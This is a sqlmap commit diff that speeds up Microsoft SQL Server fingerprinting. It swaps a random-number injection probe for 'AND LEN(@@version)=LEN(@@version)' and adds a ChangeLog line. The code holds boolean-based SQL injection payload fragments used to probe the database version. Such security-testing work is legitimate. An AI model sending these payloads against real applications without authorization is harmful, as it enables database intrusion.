Better fingerprint technique for Microsoft SQL Server

2024-11-25 11:03:47 +03:00 · 2008-12-22 23:32:43 +00:00 · 2008-12-22 23:32:43 +00:00 · b0ad102efb
commit b0ad102efb
parent 79c8d63b88
2 changed files with 5 additions and 3 deletions
--- a/doc/ChangeLog
+++ b/doc/ChangeLog
@ -7,6 +7,7 @@ sqlmap (0.6.4-1) stable; urgency=low
    manipulation statements, etc from user in SQL query and SQL shell if
    stacked queries are supported by the web application technology in
    use;
+  * Major speed increase in DBMS basic fingerprint;
  * Minor enhancement to support an option (--is-dba) to show if the
    current user is a database management system administrator;
  * Minor enhancement to support an option (--union-tech) to specify the
--- a/plugins/dbms/mssqlserver.py
+++ b/plugins/dbms/mssqlserver.py
@ -176,12 +176,13 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
        logMsg = "testing Microsoft SQL Server"
        logger.info(logMsg)

-        randInt = str(randomInt(1))
-
-        payload = agent.fullPayload(" AND LTRIM(STR(LEN(%s)))='%s'" % (randInt, randInt))
+        payload = agent.fullPayload(" AND LEN(@@version)=LEN(@@version)")
        result  = Request.queryPage(payload)

        if result == True:
+            logMsg = "confirming Microsoft SQL Server"
+            logger.info(logMsg)
+
            for version in ( 0, 5, 8 ):
                payload = agent.fullPayload(" AND SUBSTRING((@@VERSION), 25, 1)='%d'" % version)
                result  = Request.queryPage(payload)